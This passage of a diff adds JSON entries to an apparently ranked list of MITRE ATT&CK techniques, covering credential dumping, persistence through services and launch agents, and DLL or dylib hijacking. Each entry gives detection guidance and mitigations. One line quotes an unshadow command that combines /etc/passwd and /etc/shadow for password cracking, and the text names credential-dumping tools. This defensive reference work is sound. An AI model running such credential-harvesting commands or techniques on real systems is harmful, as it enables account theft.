also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + }, + { + "tid": "T1003.005", + "name": "OS Credential Dumping: Cached Domain Credentials", + "description": "Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)\nOn Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires Password Cracking to recover the plaintext password.(Citation: ired mscache)\nWith SYSTEM access, the tools/utilities such as Mimikatz, Reg, and secretsdump.py can be used to extract the cached credentials.\nNote: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)", + "url": "https://attack.mitre.org/techniques/T1003/005", + "detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\nDetection of compromised Valid Accounts in-use by adversaries may help as well.", + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1003.006", + "name": "OS Credential Dumping: DCSync", + "description": "Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.\nMembers of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in Pass the Ticket(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in Account Manipulation.(Citation: InsiderThreat ChangeNTLM July 2017)\nDCSync functionality has been included in the \"lsadump\" module in Mimikatz.(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)", + "url": "https://attack.mitre.org/techniques/T1003/006", + "detection": "Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)\nNote: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)", + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + }, + { + "tid": "T1003.007", + "name": "OS Credential Dumping: Proc Filesystem", + "description": "Adversaries may gather credentials from information stored in the Proc filesystem or /proc. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.\nThis functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.", + "url": "https://attack.mitre.org/techniques/T1003/007", + "detection": "To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc/*/maps, where the * directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + }, + { + "tid": "T1003.008", + "name": "OS Credential Dumping: /etc/passwd and /etc/shadow", + "description": "Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats)\nThe Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db", + "url": "https://attack.mitre.org/techniques/T1003/008", + "detection": "The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access /etc/passwd and /etc/shadow, alerting on the pid, process name, and arguments of such programs.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + } + ] + }, + { + "rank": 7, + "tid": "T1543", + "name": "Create or Modify System Process", + "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as Launch Daemon and Launch Agent are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection). ", + "url": "https://attack.mitre.org/techniques/T1543", + "detection": "Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. \nCommand-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. \nMonitor for changes to files associated with system-level processes.", + "score": 2.333914285714286, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1033", + "name": "Limit Software Installation", + "description": "Block users or groups from installing unapproved software.", + "url": "https://attack.mitre.org/mitigations/M1033" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ], + "subtechniques": [ + { + "tid": "T1543.001", + "name": "Create or Modify System Process: Launch Agent", + "description": "Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.\nLaunch Agents can also be executed using the Launchctl command.\nAdversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) ", + "url": "https://attack.mitre.org/techniques/T1543/001", + "detection": "Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.\nEnsure Launch Agent's ProgramArguments key pointing to executables located in the /tmp or /shared folders are in alignment with enterprise policy. Ensure all Launch Agents with the RunAtLoad key set to true are in alignment with policy. ", + "mitigations": [] + }, + { + "tid": "T1543.002", + "name": "Create or Modify System Process: Systemd Service", + "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:\n
    \n
  • ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start.
    • \n
  • ExecReload directive covers when a service restarts.
    • \n
  • ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.
    • \n
\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)", + "url": "https://attack.mitre.org/techniques/T1543/002", + "detection": "Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.\nSuspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -–type=service –all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables.\nAuditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1033", + "name": "Limit Software Installation", + "description": "Block users or groups from installing unapproved software.", + "url": "https://attack.mitre.org/mitigations/M1033" + } + ] + }, + { + "tid": "T1543.003", + "name": "Create or Modify System Process: Windows Service", + "description": "Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg. \nAdversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.\nAn adversary may also incorporate Masquerading by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. \nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution. ", + "url": "https://attack.mitre.org/techniques/T1543/003", + "detection": "Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts. \nLook for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns) \nCreation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.\nSuspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1543.004", + "name": "Create or Modify System Process: Launch Daemon", + "description": "Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)\nAdversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. Masquerading). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)\nAdditionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)", + "url": "https://attack.mitre.org/techniques/T1543/004", + "detection": "Monitor for new files added to the /Library/LaunchDaemons/ folder. The System LaunchDaemons are protected by SIP.\nSome legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the RunAtLoad parameter set to true, ensure the Program parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as Program and ProgramArguments parameters but one must be present.(Citation: launchd Keywords for plists)", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + } + ] + }, + { + "rank": 8, + "tid": "T1574", + "name": "Hijack Execution Flow", + "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.", + "url": "https://attack.mitre.org/techniques/T1574", + "detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.\nLook for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\nMonitor for changes to environment variables, as well as the commands to implement these changes.\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.\nService changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.", + "score": 2.302204761904762, + "cloud_score": 0.2, + "mitigations": [ + { + "mid": "M1013", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "url": "https://attack.mitre.org/mitigations/M1013" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1044", + "name": "Restrict Library Loading", + "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.", + "url": "https://attack.mitre.org/mitigations/M1044" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1052", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + } + ], + "subtechniques": [ + { + "tid": "T1574.001", + "name": "Hijack Execution Flow: DLL Search Order Hijacking", + "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)\nAdversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.", + "url": "https://attack.mitre.org/techniques/T1574/001", + "detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1044", + "name": "Restrict Library Loading", + "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.", + "url": "https://attack.mitre.org/mitigations/M1044" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1574.002", + "name": "Hijack Execution Flow: DLL Side-Loading", + "description": "Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking, side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).\nSide-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)", + "url": "https://attack.mitre.org/techniques/T1574/002", + "detection": "Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so) as well as the introduction of new files/programs. Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.", + "mitigations": [ + { + "mid": "M1013", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "url": "https://attack.mitre.org/mitigations/M1013" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1574.004", + "name": "Hijack Execution Flow: Dylib Hijacking", + "description": "Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.\nAdversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)", + "url": "https://attack.mitre.org/techniques/T1574/004", + "detection": "Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. \nRun path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, and LC_RPATH. Other special keywords are recognized by the macOS loader are @rpath, @loader_path, and @executable_path.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the otool -l command. Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Github EmpireProject HijackScanner)", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1574.005", + "name": "Hijack Execution Flow: Executable Installer File Permissions Weakness", + "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of DLL Search Order Hijacking.\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to Bypass User Account Control. Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.", + "url": "https://attack.mitre.org/techniques/T1574/005", + "detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1052", + "name": "User Account Control", + 